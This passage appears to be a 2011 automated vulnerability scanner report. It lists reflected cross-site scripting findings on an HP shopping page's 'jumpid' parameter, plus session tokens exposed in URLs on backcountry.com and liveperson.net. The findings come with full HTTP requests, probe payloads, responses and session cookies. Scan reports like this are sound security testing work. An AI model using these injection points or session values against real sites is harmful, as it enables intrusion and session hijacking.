HP_EBUS_HP_CLICKS=4x12x2345; 
s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fdesktops%25253BHHOJSID%25253DHWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182%25253Fjumpid_t%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_desktops_home4923e'%2525253b1cd62d1ca9e%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fstore_access.do_template_type%25253Dseries_detail%252526category%25253Ddesktops%252526series_name%25253Dp7xt_s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26hphqhhomktg%3D%2526pid%253Dhho%25257CEC%25257Cus%25257Cen%25257CFlash%252520%25253A%252520Main%252520%25253A%252520%252520Whats%252520hot%252520%25253A%252520Feature%2525201%252520%25253A%252520HP%252520Coolsense%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fh71036.www7.hp.com%25252Fhho%25252Fus%25252Fen%25252Fpclc%25252Farticles%25252Fcoolsense-technology.html%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:00:49 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkug9GW0Qp%2BMC7tvlvadgKe0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; expires=Friday, 20-Jan-2012 01:00:50 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 01:00:50 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 142501

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...
<a href="/webapp/shopping/store_access.do?clear_recommends=1&storeName=storefronts&template_type=landing&landing=desktops1646f"a="b"7e9af0dbff6&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921" class="udrlinesmall">
...[SNIP]...

1.57. http://www.shopping.hp.com/webapp/shopping/store_access.do [jumpid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/store_access.do

Issue detail

The value of the jumpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a65bb'%3bcbc9240e496 was submitted in the jumpid parameter. This input was echoed as a65bb';cbc9240e496 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921a65bb'%3bcbc9240e496 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home4923e'%3b1cd62d1ca9e
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; hpshopping=1&user_id=mlkqgtqf2Qt7MiHjv1bYeQeXlmvi; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e'%3B1cd62d1ca9e; hp_cust_seg_sel=HHO; gpv_pN=no%20value; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; lang=en-us; cc=us; prop12=r602; EMID=; s_depth=14; s_cc=true; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; HP_EBUS_HP_CLICKS=4x12x2345; 
s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fdesktops%25253BHHOJSID%25253DHWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182%25253Fjumpid_t%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_desktops_home4923e'%2525253b1cd62d1ca9e%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fstore_access.do_template_type%25253Dseries_detail%252526category%25253Ddesktops%252526series_name%25253Dp7xt_s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26hphqhhomktg%3D%2526pid%253Dhho%25257CEC%25257Cus%25257Cen%25257CFlash%252520%25253A%252520Main%252520%25253A%252520%252520Whats%252520hot%252520%25253A%252520Feature%2525201%252520%25253A%252520HP%252520Coolsense%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fh71036.www7.hp.com%25252Fhho%25252Fus%25252Fen%25252Fpclc%25252Farticles%25252Fcoolsense-technology.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:12 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkuiN6f0QhxMiDrvVfbcQyX0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; expires=Friday, 20-Jan-2012 01:01:13 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 01:01:13 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 241415


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<script language="JavaScript">

checkTab();
var s_prop4 = 'in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921a65bb';cbc9240e496|HP Pavilion p7xt series';
var s_prop21 = 'null|desktops|p7xt_series|2|';

/* Script added to introduce New Omniture Variables */

// PVCS Fix #23259 - omni_v1 was replaced by omni_serie
...[SNIP]...

1.58. http://www.shopping.hp.com/webapp/shopping/store_access.do [jumpid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/store_access.do

Issue detail

The value of the jumpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0f5c"%20a%3db%203b7c529c414 was submitted in the jumpid parameter. This input was echoed as a0f5c" a=b 3b7c529c414 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921a0f5c"%20a%3db%203b7c529c414 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home4923e'%3b1cd62d1ca9e
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; hpshopping=1&user_id=mlkqgtqf2Qt7MiHjv1bYeQeXlmvi; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e'%3B1cd62d1ca9e; hp_cust_seg_sel=HHO; gpv_pN=no%20value; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; lang=en-us; cc=us; prop12=r602; EMID=; s_depth=14; s_cc=true; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; HP_EBUS_HP_CLICKS=4x12x2345; 
s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fdesktops%25253BHHOJSID%25253DHWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182%25253Fjumpid_t%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_desktops_home4923e'%2525253b1cd62d1ca9e%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fstore_access.do_template_type%25253Dseries_detail%252526category%25253Ddesktops%252526series_name%25253Dp7xt_s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26hphqhhomktg%3D%2526pid%253Dhho%25257CEC%25257Cus%25257Cen%25257CFlash%252520%25253A%252520Main%252520%25253A%252520%252520Whats%252520hot%252520%25253A%252520Feature%2525201%252520%25253A%252520HP%252520Coolsense%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fh71036.www7.hp.com%25252Fhho%25252Fus%25252Fen%25252Fpclc%25252Farticles%25252Fcoolsense-technology.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:01:00 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlksg9%2Be2AN8MS3ivVbadgSe0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; expires=Friday, 20-Jan-2012 01:01:02 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 01:01:02 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 241546


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<a href="/webapp/shopping/store_access.do?clear_recommends=1&storeName=computer_store&catLevel=3&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921a0f5c" a=b 3b7c529c414&template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921a0f5c"%20a%3db%203b7c529c414" class="udr
...[SNIP]...

2. Session token in URL
There are 9 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


2.1. http://sales.liveperson.net/hc/9551721/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/9551721/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/9551721/?&visitor=5110247826455&msessionkey=8682657700751775312&site=9551721&cmd=mTagUrl&lpCallId=978835962945-672407449222&protV=20&lpjson=1&SV%21impression-query-name=chat-bcs&SV%21impression-query-room=chat-bcs&id=9607976011&info=button-impression%3Achat-bcs%28Gift%20Certificate%20from%20Backcountry.com%29&waitForVisitor=true&d=1316711597230&page=http%3A//sales.liveperson.net/hcp/width/img40.gif HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.backcountry.com/store/cart/add.html?item_code=BCS0021&mv_order_group=1&mv_todo=refresh&mv_form_profile=option_check&mv_session_id=&mv_order_cat_id=&mv_order_subcat_id=&mv_order_pg_id=&mv_order_catalog_id=&mv_order_is_gift_box=0&is_package=0&is_giftcert=1&mv_javascript=1&mv_sku=BCS0021-BCSGC125-ONSI&sku_options=1&mv_order_swatch_position=&mv_order_quantity=1&x=55&y=10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8682657700751775312; HumanClickSiteContainerID_9551721=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:11:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 22 Sep 2011 12:12:00 GMT
Set-Cookie: HumanClickSiteContainerID_9551721=STANDALONE; path=/hc/9551721
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 119

lpConnLib.Process({"ResultSet": {"lpCallId":"978835962945-672407449222","lpCallConfirm":"","lpData":[{"result":40}]}});

2.2. http://www.backcountry.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-New: 1
X-Session-Init: 1
X-Session-Path: No session id
X-Session-Checked: 1
Moovweb-Pagetype: HOME
Moovweb-Pageversion: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: grays
Content-Length: 91160
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:00 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...

2.3. http://www.backcountry.com/backcountry-gift-certificate-bcs0021

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /backcountry-gift-certificate-bcs0021

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /backcountry-gift-certificate-bcs0021 HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/womens-capri-pants
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cc=true; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mr_referredVisitor=0; mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713343437; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; c49=Home; s_sq=bcbackcountry%3D%2526pid%253DHome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/womens-clothing%2526ot%253DA; rdv_test_group=1; __utmx=248652180.; __utmxx=248652180.; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; RES_TRACKINGID=841292264887481; siec=true; affiliate_reference_id=R999

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
Moovweb-Pagetype: PRODUCT
Moovweb-Pageversion: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: wilson
Content-Length: 268352
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:25 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...

2.4. http://www.backcountry.com/mens-clothing

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /mens-clothing

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /mens-clothing HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/store/user.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; __utmx=248652180.; __utmxx=248652180.; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; 9551721-VID=5110247826455; 9551721-SKEY=8682657700751775312; HumanClickSiteContainerID_9551721=STANDALONE; shipping_selection=FREE; CART=mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; siec=false; affiliate_reference_id=R999; tr_template=; promo_nav=; s_cc=true; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%2C%5B%27Direct%2520Load%27%2C%271316711656080%27%5D%5D; mr_referredVisitor=0; mr_domainUserTicketID=1039053c-e24c-b398-c4aa-7037768e3b34; mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713456784; c49=Customer%20Login; s_sc_scOpen=1; s_sq=bcbackcountry%3D%2526pid%253DCustomer%252520Login%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/mens-clothing%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
Moovweb-Pagetype: CATEGORY
Moovweb-Pageversion: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: wilson
Content-Length: 104410
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:13:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:13:34 GMT
Set-Cookie: siec=false; path=/; expires=Tue, 21-Sep-2021 22:13:33 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:13:33 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:13:34 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:13:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<noscript>
<a href="https://sales.liveperson.net/hc/9551721/?cmd=file&amp;file=visitorWantsToChat&amp;site=9551721&amp;byhref=1&amp;AEPARAMS&amp;SESSIONVAR!StaticButtonNameNoScript=Generic" title="Live Chat" target="chat9551721">Live Chat</a>
...[SNIP]...

2.5. http://www.backcountry.com/prana-bliss-capri-pant-womens

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.backcountry.com
Path:   /prana-bliss-capri-pant-womens

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /prana-bliss-capri-pant-womens HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.backcountry.com/womens-capri-pants
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cc=true; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; mr_referredVisitor=0; mt.v=1.346469883.1316711542790; utag=session_id:1316711948944$_session:1316713343437; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; __ar_v4=; c49=Home; s_sq=bcbackcountry%3D%2526pid%253DHome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/womens-clothing%2526ot%253DA; rdv_test_group=1; __utmx=248652180.; __utmxx=248652180.; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; RES_TRACKINGID=841292264887481; siec=true; affiliate_reference_id=R999

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
Moovweb-Pagetype: PRODUCT
Moovweb-Pageversion: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: lincoln
Content-Length: 138134
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:11:23 GMT
Connection: close
Vary: Accept-Encoding

